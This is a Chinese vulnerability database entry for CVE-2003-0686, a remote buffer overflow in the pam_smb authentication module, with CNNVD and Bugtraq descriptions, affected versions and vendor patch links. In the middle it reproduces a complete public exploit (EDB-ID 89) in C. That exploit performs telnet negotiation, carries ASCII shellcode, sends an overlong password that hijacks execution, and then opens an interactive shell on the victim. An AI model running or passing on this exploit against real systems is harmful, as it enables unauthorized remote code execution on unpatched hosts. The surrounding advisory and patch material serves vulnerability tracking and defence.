CVE-2003-0686
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2016-10-17 22:36:34
NMCOES    

[原文]Buffer overflow in PAM SMB module (pam_smb) 1.1.6 and earlier, when authenticating to a remote service, allows remote attackers to execute arbitrary code.


[CNNVD]Pam_SMB远程缓冲区溢出漏洞(CNNVD-200310-061)

        
        pam_smb是一款使用SMB服务器上的用于验证用户的验证模块。
        pam_smb模块的login.c存在远程缓冲区溢出问题,远程攻击者可以利用这个漏洞以模块进程权限在系统上执行任意指令。
        攻击者如果提供超长的密码,pam_smb模块解析时就会导致触发缓冲区溢出,精心构建提交上可以以调用pam_smb模块进程的权限在系统上执行任意指令。
        不过此漏洞需要用户存在于密码文件中以允许其登录提供密码信息。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:dave_airlie:pam_smb:1.1.6Samba pam_smb 1.1.6
cpe:/a:redhat:pam_smb:1.1.6-2::ia64
cpe:/a:redhat:pam_smb:1.1.6-5::i386
cpe:/a:dave_airlie:pam_smb:1.1.4Samba pam_smb 1.1.4
cpe:/a:dave_airlie:pam_smb:1.1Samba pam_smb 1.1
cpe:/a:dave_airlie:pam_smb:1.1.5Samba pam_smb 1.1.5
cpe:/a:redhat:pam_smb:1.1.6-7::i386
cpe:/a:dave_airlie:pam_smb:1.1.2Samba pam_smb 1.1.2
cpe:/a:redhat:pam_smb:1.1.6-2::i386
cpe:/a:dave_airlie:pam_smb:1.1.3Samba pam_smb 1.1.3
cpe:/a:dave_airlie:pam_smb:1.1.1Samba pam_smb 1.1.1
cpe:/a:dave_airlie:pam_smb:2.0_rc4Samba pam_smb 2.0 rc4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:469Buffer Overflow in PAM SMB Module
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0686
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0686
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-061
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000734
(UNKNOWN)  CONECTIVA  CLA-2003:734
http://marc.info/?l=bugtraq&m=106252769930090&w=2
(UNKNOWN)  BUGTRAQ  20030901 GLSA: pam_smb (200309-01)
http://us2.samba.org/samba/ftp/pam_smb/
(UNKNOWN)  CONFIRM  http://us2.samba.org/samba/ftp/pam_smb/
http://www.debian.org/security/2003/dsa-374
(VENDOR_ADVISORY)  DEBIAN  DSA-374
http://www.kb.cert.org/vuls/id/680260
(UNKNOWN)  CERT-VN  VU#680260
http://www.redhat.com/support/errata/RHSA-2003-261.html
(UNKNOWN)  REDHAT  RHSA-2003:261
http://www.redhat.com/support/errata/RHSA-2003-262.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:262
http://www.turbolinux.com/security/TLSA-2003-50.txt
(UNKNOWN)  TURBO  TLSA-2003-50

- 漏洞信息

Pam_SMB远程缓冲区溢出漏洞
高危 边界条件错误
2003-10-20 00:00:00 2006-09-22 00:00:00
远程  
        
        pam_smb是一款使用SMB服务器上的用于验证用户的验证模块。
        pam_smb模块的login.c存在远程缓冲区溢出问题,远程攻击者可以利用这个漏洞以模块进程权限在系统上执行任意指令。
        攻击者如果提供超长的密码,pam_smb模块解析时就会导致触发缓冲区溢出,精心构建提交上可以以调用pam_smb模块进程的权限在系统上执行任意指令。
        不过此漏洞需要用户存在于密码文件中以允许其登录提供密码信息。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-374

        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:261-01)以及相应补丁:
        RHSA-2003:261-01:Updated pam_smb packages fix remote buffer overflow.
        链接:https://www.redhat.com/support/errata/RHSA-2003-261.html
        补丁下载:
        Red Hat Linux 7.2:
        SRPMS:
        ftp://updates.redhat.com/7.2/en/os/SRPMS/pam_smb-1.1.6-9.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.2/en/os/i386/pam_smb-1.1.6-9.7.i386.rpm
        ia64:
        ftp://updates.redhat.com/7.2/en/os/ia64/pam_smb-1.1.6-9.7.ia64.rpm
        Red Hat Linux 7.3:
        SRPMS:
        ftp://updates.redhat.com/7.3/en/os/SRPMS/pam_smb-1.1.6-9.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.3/en/os/i386/pam_smb-1.1.6-9.7.i386.rpm
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/pam_smb-1.1.6-9.8.src.rpm
        i386:
        ftp://updates.redhat.com/8.0/en/os/i386/pam_smb-1.1.6-9.8.i386.rpm
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/pam_smb-1.1.6-9.9.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/pam_smb-1.1.6-9.9.i386.rpm

- 漏洞信息 (89)

Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit (EDBID:89)
linux remote
2003-08-29 Verified
23 vertex
N/A [点击下载]
/*
 * Linux pam_lib_smb < 1.1.6  /bin/login exploit
 * by vertex  
 *
 * Tested on Redhat 8.0, 9.0
 * 
 * 
 * Advisory at 
 * 	http://us2.samba.org/samba/ftp/pam_smb/
 *
 * code based on : UC_login.c
 * SunOS 5.6,5.7,5.8 remote /bin/login root exploit
 * [mikecc/unixclan]
 * 
 * =============================================================
 * In order to use pam_lib_smb, need to add following line on top 
 * of /etc/pam.d/login 
 * 
 * auth       required     /lib/security/pam_smb_auth.so
 * 
 * And config the /etc/pam_smb.conf correctly.
 * 
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

/* first negotiate */
/* packet capture by ethereal */
char packet_1[] = {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff, 
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05, 
0xff, 0xfb, 0x23 };
char packet_2[] = {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff, 
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34, 
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30, 
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69, 
0x64, 0x73, 

/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48, 
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68, 
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f, 
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72, 
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50, 
0x4c, 0x41, 0x59, 0x01, 
};

char packet_2_1[]={

0x6c, 0x69, 0x64, 0x73, 
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00, 
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };

/* here is the TERM value */
/*
*/

void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);

/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";


int main(int argc,char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;   
	short port = -1;
	int x;
	char *host = NULL;
	char *user = NULL;
	char exp[1024]; 
	int a;
	char *default_port = "23";

	printf("linux_pam_smb\n");
	printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
	printf("[vertex//lids/org]\n\n");
	if (argc < 2) 
	{
		printf("%s -h <victim> [-p port] \n",argv[0]);
		return 0;
	}
	while ((a = getopt(argc,argv,"h:p:u:")) != -1)
	{
		switch (a)	
		{
			case 'h':
				host = optarg;
				break;
			
                        case 'p':
                                port = atoi(optarg);
                                break;

			default:
				printf("[-] invalid option.\n");
				break;
		}
	}
	if (host == NULL)
	{
		printf("[-] must specify a host to attack\n"); 
		return 0;
        }
	if (port < 0)
		port = atoi(default_port);
	if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
	printf("[*] attacking %s:%d\n",host,port);
	printf("[*] opening socket\n");
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("[-] could not create socket");
                return 0;
        }
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
	if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("[-] failed to connect to %s\n",host);  
                return 0;
        }
	printf("[*] connected!\n");
	printf("[*] Begin negotiate... \n");
	negotiate(sd);
	printf("[*] Login... \n");
	login(sd);
	return 0;
}


void login(int sd)
{
	char buf[1024];
	char exploit_buf[172];
	char cx[3]="\r\n\0";
	int x;
  	fd_set rset;

	memset(exploit_buf,'\0',172);
	/* let's jump to 0xbffffe30 */
	/* eb 30 fe ff bf */

	x = 0;
	exploit_buf[x++]=0x68;
	/* push 0xbffffe30 */
	/* shellcode address */
	exploit_buf[x++]=0x30;
	exploit_buf[x++]=0xfe;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xff;
	exploit_buf[x++]=0xbf;
	exploit_buf[x++]=0xbf;
	/* ret */
	exploit_buf[x++]=0xc3;
	
	memset(exploit_buf+x,'A',150);
	x+=150;

/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is 
	pop $exx
	pop $exx
	ret 
*/
	exploit_buf[x++]=0xb5;
	exploit_buf[x++]=0xd4;

	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, "xie\r\n\0");

	printf("[*] sending username \n");
	sendstr(sd,buf,strlen(buf));
	
	sleep(1);
	printf("[*] sending password\n");
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, exploit_buf);
	strcat(buf,"\r\n\0");
	sendstr(sd,buf,strlen(buf));

	sleep(2);
	fflush(stdout);
	FD_ZERO(&rset);
	while (1)
	{
		FD_SET(sd,&rset);
		FD_SET(0,&rset); 
		select(sd+1,&rset,0,0,0);
		if (FD_ISSET(sd,&rset)) 
		{
			memset(buf,'\0',sizeof(buf));
			if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
			{
				printf("Connection closed by foreign host.\n");
				exit(-1);
			}
			fprintf(stderr,"%s",buf);
		}
		if (FD_ISSET(0,&rset))
		{
			memset(buf,'\0',sizeof(buf));
			if ((x = read(0,buf,sizeof(buf)-1)) > 0)
			{
				write(sd,buf,x);
			}
		}
	}
}		

/*
 * telnet negotiation needed for
 * talking with the telnet protocol
*/

void negotiate(int sd)
{
	char buf[1024];
	char nop[64];
	int len;

	sendstr(sd, packet_1,sizeof(packet_1));
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	memset(nop,'A',sizeof(nop));
	memcpy(buf,packet_2,sizeof(packet_2));
	/* adding NOP */
	memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
	/* shellcode */
	memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
	/* left packet */
	memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
	
	len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
	sendstr(sd, buf, len);
	sleep(1);
	
	/* wont echo */
	wont(sd,TELOPT_ECHO);
	sleep(1);
	/* do echo */
	cmd(sd,TELOPT_ECHO);

	sleep(2);
}

/* 
 * send a telnet WONT
 *
 * structure of a telnet WONT is:
 * 	1. IAC
 * 	2. WONT
 *	3. what you wont do
 *	(all of the above are found in arpa/telnet.h)
*/

void wont(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WONT,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}

/*
 * send a telnet WILL
 *
 * structure of a telnet WILL is:
 *	1. IAC
 *	2. WILL
 *	3. what you will do 
 *	(all of the above are found in arpa/telnet.h)
*/

void will(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WILL,opt);
        write(sd,buf,3); /* no error checking, uh-oh! */
}   
void cmd(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c\xfd%c",IAC,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
 *
 */
void sendstr(int sd,char *str,int length)
{

        write(sd,str,length);
	sleep(1);
}


// milw0rm.com [2003-08-29]
		

- 漏洞信息

2476
PAM SMB Module (pam_smb) Service Authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-08-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Pam_SMB Remote Buffer Overflow Vulnerability
Boundary Condition Error 8491
Yes No
2003-08-26 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Craig Miskell.

- 受影响的程序版本

Sun Linux 5.0.7
SGI ProPack 2.3
SGI ProPack 2.2.1
RedHat pam_smb-1.1.6-7.i386.rpm
+ RedHat Linux 9.0 i386
RedHat pam_smb-1.1.6-5.i386.rpm
+ RedHat Linux 8.0 i386
RedHat pam_smb-1.1.6-2.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat pam_smb-1.1.6-2.i386.rpm
+ RedHat Linux 7.3 i386
RedHat pam_smb-1.1.6-2.i386.rpm
+ RedHat Linux 7.2 i386
pam_smb pam_smb 2.0 -rc4
pam_smb pam_smb 1.1.6
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
pam_smb pam_smb 1.1.5
pam_smb pam_smb 1.1.4
pam_smb pam_smb 1.1.3
pam_smb pam_smb 1.1.2
pam_smb pam_smb 1.1.1
pam_smb pam_smb 1.1
pam_smb pam_smb 2.0 -rc5
pam_smb pam_smb 1.1.7

- 不受影响的程序版本

pam_smb pam_smb 2.0 -rc5
pam_smb pam_smb 1.1.7

- 漏洞讨论

pam_smb has been reported prone to a buffer overflow vulnerability. It has been reported that systems using pam_smb to authenticate to a remotely accessible service may be vulnerable to a condition that could allow a remote attacker to supply and execute arbitrary code in the context of the vulnerable module.

- 漏洞利用

An exploit has been made developed by Vertex.

- 解决方案

Sun have released fixes to address this vulnerability in Sun Linux 5.0.7. Users who are affected by this issue are advised to apply relevant fixes as soon as possible. Please see Sun reference (Sun Linux Support - Sun Linux Patches (Sun)) for further details regarding obtaining and applying appropriate fixes.

Red Hat has released a security advisory (RHSA-2003-262) to address this issue for enterprise customers. Further information regarding obtaining and applying fixes can be found in the referenced advisory.

Red Hat has released a security advisory (RHSA-2003:261-01) to address this issue. Customers who are affected by this issue are advised to apply the relevant fixes as soon as possible. Fixes are linked below. Further information regarding applying fixes can be found in the referenced advisory.

Debian has released an advisory (DSA 374-1) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Turbolinux has released an advisory (TLSA-2003-50) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo Linux has released a security advisory (200309-01) to address this issue. Users who are affected by this issue are advised to do the following:

emerge sync
emerge pam_smb
emerge clean

SuSE has released an advisory (SuSE-SA:2003:036) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Conectiva has released an advisory (CLSA-2003:733) that addresses this issue. Please see references for details on obtaining and applying fixes.

Conectiva has released an advisory (CLSA-2003:734) containing updated packages that addresses this issue. Please see references for details on obtaining and applying fixes.

SGI has released an advisory (20031002-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10027) containing updated RPM packages relating to 22 different BIDS.

Patch 10027 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10027, please see the attached advisory.

pam_smb have released a stable upgrade to address this issue:


RedHat pam_smb-1.1.6-2.ia64.rpm

RedHat pam_smb-1.1.6-5.i386.rpm

RedHat pam_smb-1.1.6-2.i386.rpm

RedHat pam_smb-1.1.6-2.i386.rpm

RedHat pam_smb-1.1.6-7.i386.rpm

pam_smb pam_smb 1.1

pam_smb pam_smb 1.1.1

pam_smb pam_smb 1.1.2

pam_smb pam_smb 1.1.3

pam_smb pam_smb 1.1.4

pam_smb pam_smb 1.1.5

pam_smb pam_smb 1.1.6

Sun Linux 5.0.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站